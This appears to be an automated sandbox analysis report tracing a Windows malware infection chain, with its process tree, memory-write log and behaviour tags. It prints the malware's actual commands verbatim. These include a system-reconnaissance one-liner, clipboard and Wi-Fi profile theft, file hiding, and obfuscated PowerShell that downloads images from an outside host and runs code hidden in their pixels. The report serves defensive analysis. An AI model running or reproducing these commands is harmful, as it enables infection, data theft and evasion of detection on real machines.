PID 3280 wrote to memory of 4200	3280	axplong.exe	86
PID 3280 wrote to memory of 4200	3280	axplong.exe	86
PID 4200 wrote to memory of 1680	4200	alex2022.exe	88
PID 4200 wrote to memory of 1680	4200	alex2022.exe	88
PID 4200 wrote to memory of 1680	4200	alex2022.exe	88
PID 4200 wrote to memory of 1680	4200	alex2022.exe	88
PID 4200 wrote to memory of 1680	4200	alex2022.exe	88
PID 4200 wrote to memory of 1680	4200	alex2022.exe	88
PID 4200 wrote to memory of 1680	4200	alex2022.exe	88
PID 4200 wrote to memory of 1680	4200	alex2022.exe	88
PID 4200 wrote to memory of 1680	4200	alex2022.exe	88
PID 4200 wrote to memory of 1680	4200	alex2022.exe	88
PID 3280 wrote to memory of 2348	3280	axplong.exe	90
PID 3280 wrote to memory of 2348	3280	axplong.exe	90
PID 3280 wrote to memory of 2348	3280	axplong.exe	90
PID 3280 wrote to memory of 864	3280	axplong.exe	94
PID 3280 wrote to memory of 864	3280	axplong.exe	94
PID 3280 wrote to memory of 864	3280	axplong.exe	94
PID 864 wrote to memory of 4948	864	AllNew.exe	98
PID 864 wrote to memory of 4948	864	AllNew.exe	98
PID 864 wrote to memory of 4948	864	AllNew.exe	98
PID 3280 wrote to memory of 1032	3280	axplong.exe	106
PID 3280 wrote to memory of 1032	3280	axplong.exe	106
PID 3280 wrote to memory of 1032	3280	axplong.exe	106
PID 3280 wrote to memory of 1456	3280	axplong.exe	111
PID 3280 wrote to memory of 1456	3280	axplong.exe	111
PID 3280 wrote to memory of 1456	3280	axplong.exe	111
PID 1456 wrote to memory of 464	1456	ATLEQQXO.exe	112
PID 1456 wrote to memory of 464	1456	ATLEQQXO.exe	112
PID 1456 wrote to memory of 464	1456	ATLEQQXO.exe	112
PID 3280 wrote to memory of 3432	3280	axplong.exe	113
PID 3280 wrote to memory of 3432	3280	axplong.exe	113
PID 3432 wrote to memory of 4148	3432	roblox1.exe	115
PID 3432 wrote to memory of 4148	3432	roblox1.exe	115
PID 4148 wrote to memory of 1968	4148	stub.exe	116
PID 4148 wrote to memory of 1968	4148	stub.exe	116
PID 4148 wrote to memory of 4272	4148	stub.exe	117
PID 4148 wrote to memory of 4272	4148	stub.exe	117
PID 4148 wrote to memory of 2788	4148	stub.exe	118
PID 4148 wrote to memory of 2788	4148	stub.exe	118
PID 4272 wrote to memory of 2864	4272	cmd.exe	119
PID 4272 wrote to memory of 2864	4272	cmd.exe	119
PID 2788 wrote to memory of 3308	2788	cmd.exe	120
PID 2788 wrote to memory of 3308	2788	cmd.exe	120
PID 4148 wrote to memory of 2876	4148	stub.exe	121
PID 4148 wrote to memory of 2876	4148	stub.exe	121
PID 2876 wrote to memory of 5108	2876	cmd.exe	122
PID 2876 wrote to memory of 5108	2876	cmd.exe	122
PID 4148 wrote to memory of 1680	4148	stub.exe	123
PID 4148 wrote to memory of 1680	4148	stub.exe	123
PID 4148 wrote to memory of 2672	4148	stub.exe	124
PID 4148 wrote to memory of 2672	4148	stub.exe	124
PID 1680 wrote to memory of 2412	1680	cmd.exe	125
PID 1680 wrote to memory of 2412	1680	cmd.exe	125
PID 2672 wrote to memory of 3320	2672	cmd.exe	126
PID 2672 wrote to memory of 3320	2672	cmd.exe	126
PID 464 wrote to memory of 2668	464	pyexec.exe	128

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5108	attrib.exe

outlook_office_path 1 IoCs

description	ioc	Process
Key queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	powershell.exe

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2652
- C:\Windows\SysWOW64\svchost.exe
  "C:\Windows\System32\svchost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:320

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4784
- C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
  "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:3280
- - C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
    "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:3584
- - C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe
    "C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4200
  - - C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe
      "C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1680
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1680 -s 1328
        5⤵
        Program crash
        
        PID:4272
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1680 -s 1308
        5⤵
        Program crash
        
        PID:4360
- - C:\Users\Admin\AppData\Local\Temp\1002824001\e4ba0b926b.exe
    "C:\Users\Admin\AppData\Local\Temp\1002824001\e4ba0b926b.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2348
- - C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe
    "C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:864
  - - C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
      "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4948
- - C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe
    "C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1032
- - C:\Users\Admin\AppData\Local\Temp\1004628001\ATLEQQXO.exe
    "C:\Users\Admin\AppData\Local\Temp\1004628001\ATLEQQXO.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1456
  - - C:\Users\Admin\AppData\Local\Temp\pyexec.exe
      "C:\Users\Admin\AppData\Local\Temp\pyexec.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:464
    - - C:\Users\Admin\AppData\Roaming\UpdateChrome_Ze\pyexec.exe
        
        C:\Users\Admin\AppData\Roaming\UpdateChrome_Ze\pyexec.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:2668
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:852
        
        C:\Users\Admin\AppData\Local\Temp\uzfvalidate.exe
        
        C:\Users\Admin\AppData\Local\Temp\uzfvalidate.exe
        7⤵
        Loads dropped DLL
        
        PID:5468
- - C:\Users\Admin\AppData\Local\Temp\1004850001\roblox1.exe
    "C:\Users\Admin\AppData\Local\Temp\1004850001\roblox1.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3432
  - - C:\Users\Admin\AppData\Local\Temp\onefile_3432_133776584119788921\stub.exe
      C:\Users\Admin\AppData\Local\Temp\1004850001\roblox1.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:4148
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:1968
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4272
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2864
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2788
      - C:\Windows\system32\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3308
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
        5⤵
        Hide Artifacts: Hidden Files and Directories
        Suspicious use of WriteProcessMemory
        
        PID:2876
      - C:\Windows\system32\attrib.exe
        
        attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
        6⤵
        Views/modifies file attributes
        
        PID:5108
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1680
      - C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
        6⤵
        
        PID:2412
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2672
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM chrome.exe
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3320
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:5016
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:1160
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
        5⤵
        Clipboard Data
        
        PID:1096
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Get-Clipboard
        6⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4520
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "chcp"
        5⤵
        
        PID:4596
      - C:\Windows\system32\chcp.com
        
        chcp
        6⤵
        
        PID:1340
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "chcp"
        5⤵
        
        PID:3540
      - C:\Windows\system32\chcp.com
        
        chcp
        6⤵
        
        PID:2752
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        5⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:864
      - C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        6⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:588
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
        5⤵
        Network Service Discovery
        
        PID:1528
      - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        6⤵
        Gathers system information
        
        PID:612
      - C:\Windows\system32\HOSTNAME.EXE
        
        hostname
        6⤵
        
        PID:3556
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic logicaldisk get caption,description,providername
        6⤵
        Collects information from the system
        Suspicious use of AdjustPrivilegeToken
        
        PID:1920
      - C:\Windows\system32\net.exe
        
        net user
        6⤵
        
        PID:3016
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user
        7⤵
        
        PID:4944
      - C:\Windows\system32\query.exe
        
        query user
        6⤵
        
        PID:4664
        
        C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        7⤵
        
        PID:2216
      - C:\Windows\system32\net.exe
        
        net localgroup
        6⤵
        
        PID:4500
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup
        7⤵
        
        PID:4824
      - C:\Windows\system32\net.exe
        
        net localgroup administrators
        6⤵
        
        PID:4596
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup administrators
        7⤵
        
        PID:2104
      - C:\Windows\system32\net.exe
        
        net user guest
        6⤵
        
        PID:4796
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user guest
        7⤵
        
        PID:868
      - C:\Windows\system32\net.exe
        
        net user administrator
        6⤵
        
        PID:3520
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user administrator
        7⤵
        
        PID:4632
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic startup get caption,command
        6⤵
        
        PID:4776
      - C:\Windows\system32\tasklist.exe
        
        tasklist /svc
        6⤵
        Enumerates processes with tasklist
        
        PID:1572
      - C:\Windows\system32\ipconfig.exe
        
        ipconfig /all
        6⤵
        Gathers network information
        
        PID:1500
      - C:\Windows\system32\ROUTE.EXE
        
        route print
        6⤵
        
        PID:4108
      - C:\Windows\system32\ARP.EXE
        
        arp -a
        6⤵
        Network Service Discovery
        
        PID:656
      - C:\Windows\system32\NETSTAT.EXE
        
        netstat -ano
        6⤵
        System Network Connections Discovery
        Gathers network information
        
        PID:5116
      - C:\Windows\system32\sc.exe
        
        sc query type= service state= all
        6⤵
        Launches sc.exe
        
        PID:884
      - C:\Windows\system32\netsh.exe
        
        netsh firewall show state
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4348
      - C:\Windows\system32\netsh.exe
        
        netsh firewall show config
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:600
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:864
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:444
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:2904
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:1464
- - C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe
    "C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:4840
  - - C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
      "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2724
    - - C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
        
        "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
        5⤵
        
        PID:2892
    - - C:\Users\Admin\10009130102\Properties.exe
        
        "C:\Users\Admin\10009130102\Properties.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2744
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powershell -NoProfile -NonInteractive -exec bypass "Set-PSReadLineOption -HistorySaveStyle SaveNothing; Function c { & ([ScriptBlock]::Create([System.Text.Encoding]::Default.GetString(@(65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,68,114,97,119,105,110,103,13,10,65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,78,101,116,13,10,13,10,36,119,101,98,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,13,10,36,117,114,108,32,61,32,34,104,116,116,112,115,58,47,47,105,46,105,109,103,104,105,112,112,111,46,99,111,109,47,102,105,108,101,115,47,115,101,116,53,57,49,50,80,121,89,46,66,109,112,34,13,10,36,109,115,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,73,79,46,77,101,109,111,114,121,83,116,114,101,97,109,13,10,36,119,101,98,46,68,111,119,110,108,111,97,100,68,97,116,97,40,36,117,114,108,41,32,124,32,37,32,123,32,36,109,115,46,87,114,105,116,101,40,36,95,44,32,48,44,32,36,95,46,76,101,110,103,116,104,41,32,125,13,10,36,109,115,46,80,111,115,105,116,105,111,110,32,61,32,48,13,10,36,105,109,103,49,32,61,32,91,83,121,115,116,101,109,46,68,114,97,119,105,110,103,46,73,109,97,103,101,93,58,58,70,114,111,109,83,116,114,101,97,109,40,36,109,115,41,13,10,36,101,110,32,61,32,78,101,119,45,79,98,106,101,99,116,32,39,83,121,115,116,101,109,46,67,111,108,108,101,99,116,105,111,110,115,46,71,101,110,101,114,105,99,46,76,105,115,116,91,66,121,116,101,93,39,13,10,102,111,114,101,97,99,104,40,36,120,32,105,110,32,49,46,46,36,105,109,103,49,46,87,105,100,116,104,41,32,123,13,10,32,32,32,32,36,101,110,46,65,100,100,40,40,36,105,109,103,49,46,71,101,116,80,105,120,101,108,40,36,120,32,45,32,49,44,32,48,41,46,82,41,41,13,10,125,13,10,36,112,108,32,61,32,91,83,121,115,116,101,109,46,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,85,84,70,56,46,71,101,116,83,116,114,105,110,103,40,36,101,110,46,84,111,65,114,114,97,121,40,41,41,13,10,36,115,98,32,61,32,91,83,99,114,105,112,116,66,108,111,99,107,93,58,58,67,114,101,97,116,101,40,36,112,108,41,13,10,105,99,109,32,36,115,98,13,10,13,10,35,82,82,82,82)))); } c #d "
        6⤵
        An obfuscated cmd.exe command-line is typically used to evade detection.
        
        PID:372
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -NoProfile -NonInteractive -exec bypass "Set-PSReadLineOption -HistorySaveStyle SaveNothing; Function c { & ([ScriptBlock]::Create([System.Text.Encoding]::Default.GetString(@(65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,68,114,97,119,105,110,103,13,10,65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,78,101,116,13,10,13,10,36,119,101,98,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,13,10,36,117,114,108,32,61,32,34,104,116,116,112,115,58,47,47,105,46,105,109,103,104,105,112,112,111,46,99,111,109,47,102,105,108,101,115,47,115,101,116,53,57,49,50,80,121,89,46,66,109,112,34,13,10,36,109,115,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,73,79,46,77,101,109,111,114,121,83,116,114,101,97,109,13,10,36,119,101,98,46,68,111,119,110,108,111,97,100,68,97,116,97,40,36,117,114,108,41,32,124,32,37,32,123,32,36,109,115,46,87,114,105,116,101,40,36,95,44,32,48,44,32,36,95,46,76,101,110,103,116,104,41,32,125,13,10,36,109,115,46,80,111,115,105,116,105,111,110,32,61,32,48,13,10,36,105,109,103,49,32,61,32,91,83,121,115,116,101,109,46,68,114,97,119,105,110,103,46,73,109,97,103,101,93,58,58,70,114,111,109,83,116,114,101,97,109,40,36,109,115,41,13,10,36,101,110,32,61,32,78,101,119,45,79,98,106,101,99,116,32,39,83,121,115,116,101,109,46,67,111,108,108,101,99,116,105,111,110,115,46,71,101,110,101,114,105,99,46,76,105,115,116,91,66,121,116,101,93,39,13,10,102,111,114,101,97,99,104,40,36,120,32,105,110,32,49,46,46,36,105,109,103,49,46,87,105,100,116,104,41,32,123,13,10,32,32,32,32,36,101,110,46,65,100,100,40,40,36,105,109,103,49,46,71,101,116,80,105,120,101,108,40,36,120,32,45,32,49,44,32,48,41,46,82,41,41,13,10,125,13,10,36,112,108,32,61,32,91,83,121,115,116,101,109,46,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,85,84,70,56,46,71,101,116,83,116,114,105,110,103,40,36,101,110,46,84,111,65,114,114,97,121,40,41,41,13,10,36,115,98,32,61,32,91,83,99,114,105,112,116,66,108,111,99,107,93,58,58,67,114,101,97,116,101,40,36,112,108,41,13,10,105,99,109,32,36,115,98,13,10,13,10,35,82,82,82,82)))); } c #d
        7⤵
        UAC bypass
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:2588
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\deleteSelf.bat" "
        6⤵
        
        PID:932
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2216
    - - C:\Users\Admin\10009150102\7749.exe
        
        "C:\Users\Admin\10009150102\7749.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3500
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" cmd /c powershell -NoProfile -NonInteractive -exec bypass "Set-PSReadLineOption -HistorySaveStyle SaveNothing; Function c { & ([ScriptBlock]::Create([System.Text.Encoding]::Default.GetString(@(83,101,116,45,80,83,82,101,97,100,76,105,110,101,79,112,116,105,111,110,32,45,72,105,115,116,111,114,121,83,97,118,101,83,116,121,108,101,32,83,97,118,101,78,111,116,104,105,110,103,13,10,65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,68,114,97,119,105,110,103,13,10,65,100,100,45,84,121,112,101,32,45,65,115,115,101,109,98,108,121,78,97,109,101,32,83,121,115,116,101,109,46,78,101,116,13,10,13,10,36,119,101,99,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,78,101,116,46,87,101,98,67,108,105,101,110,116,13,10,36,117,114,108,32,61,32,34,104,116,116,112,115,58,47,47,105,46,105,109,103,104,105,112,112,111,46,99,111,109,47,102,105,108,101,115,47,71,71,86,57,54,48,52,76,103,46,66,109,112,34,13,10,36,109,101,109,115,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,73,79,46,77,101,109,111,114,121,83,116,114,101,97,109,13,10,36,119,101,99,46,68,111,119,110,108,111,97,100,68,97,116,97,40,36,117,114,108,41,32,124,32,37,32,123,32,36,109,101,109,115,46,87,114,105,116,101,40,36,95,44,32,48,44,32,36,95,46,76,101,110,103,116,104,41,32,125,13,10,13,10,36,109,101,109,115,46,80,111,115,105,116,105,111,110,32,61,32,48,13,10,36,105,109,103,49,32,61,32,91,83,121,115,116,101,109,46,68,114,97,119,105,110,103,46,73,109,97,103,101,93,58,58,70,114,111,109,83,116,114,101,97,109,40,36,109,101,109,115,41,13,10,13,10,36,101,110,99,32,61,32,78,101,119,45,79,98,106,101,99,116,32,39,83,121,115,116,101,109,46,67,111,108,108,101,99,116,105,111,110,115,46,71,101,110,101,114,105,99,46,76,105,115,116,91,66,121,116,101,93,39,13,10,13,10,13,10,36,98,105,116,100,32,61,32,36,105,109,103,49,46,76,111,99,107,66,105,116,115,40,91,83,121,115,116,101,109,46,68,114,97,119,105,110,103,46,82,101,99,116,97,110,103,108,101,93,58,58,70,114,111,109,76,84,82,66,40,48,44,32,48,44,32,36,105,109,103,49,46,87,105,100,116,104,44,32,36,105,109,103,49,46,72,101,105,103,104,116,41,44,32,91,83,121,115,116,101,109,46,68,114,97,119,105,110,103,46,73,109,97,103,105,110,103,46,73,109,97,103,101,76,111,99,107,77,111,100,101,93,58,58,82,101,97,100,79,110,108,121,44,32,91,83,121,115,116,101,109,46,68,114,97,119,105,110,103,46,73,109,97,103,105,110,103,46,80,105,120,101,108,70,111,114,109,97,116,93,58,58,70,111,114,109,97,116,51,50,98,112,112,65,114,103,98,41,13,10,36,115,99,48,49,32,61,32,36,98,105,116,100,46,83,99,97,110,48,13,10,36,115,116,114,105,49,32,61,32,36,98,105,116,100,46,83,116,114,105,100,101,13,10,13,10,13,10,102,111,114,32,40,36,121,32,61,32,48,59,32,36,121,32,45,108,116,32,36,105,109,103,49,46,72,101,105,103,104,116,59,32,36,121,43,43,41,32,123,13,10,32,32,32,32,102,111,114,32,40,36,120,32,61,32,48,59,32,36,120,32,45,108,116,32,36,105,109,103,49,46,87,105,100,116,104,59,32,36,120,43,43,41,32,123,13,10,32,32,32,32,32,32,32,32,36,112,105,120,101,108,79,102,102,115,101,116,32,61,32,36,121,32,42,32,36,115,116,114,105,49,32,43,32,36,120,32,42,32,52,13,10,32,32,32,32,32,32,32,32,36,98,121,116,101,32,61,32,91,83,121,115,116,101,109,46,82,117,110,116,105,109,101,46,73,110,116,101,114,111,112,83,101,114,118,105,99,101,115,46,77,97,114,115,104,97,108,93,58,58,82,101,97,100,66,121,116,101,40,36,115,99,48,49,44,32,36,112,105,120,101,108,79,102,102,115,101,116,41,13,10,32,32,32,32,32,32,32,32,36,101,110,99,46,65,100,100,40,36,98,121,116,101,41,13,10,32,32,32,32,125,13,10,125,13,10,13,10,13,10,36,105,109,103,49,46,85,110,108,111,99,107,66,105,116,115,40,36,98,105,116,100,41,13,10,13,10,36,97,115,115,101,109,98,108,121,32,61,32,91,82,101,102,108,101,99,116,105,111,110,46,65,115,115,101,109,98,108,121,93,58,58,76,111,97,100,40,36,101,110,99,46,84,111,65,114,114,97,121,40,41,41,13,10,36,97,115,115,101,109,98,108,121,46,69,110,116,114,121,80,111,105,110,116,46,73,110,118,111,107,101,40,36,110,117,108,108,44,32,64,40,41,41,13,10,13,10)))); } c #c "
        6⤵
        An obfuscated cmd.exe command-line is typically used to evade detection.
        
        PID:3268
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
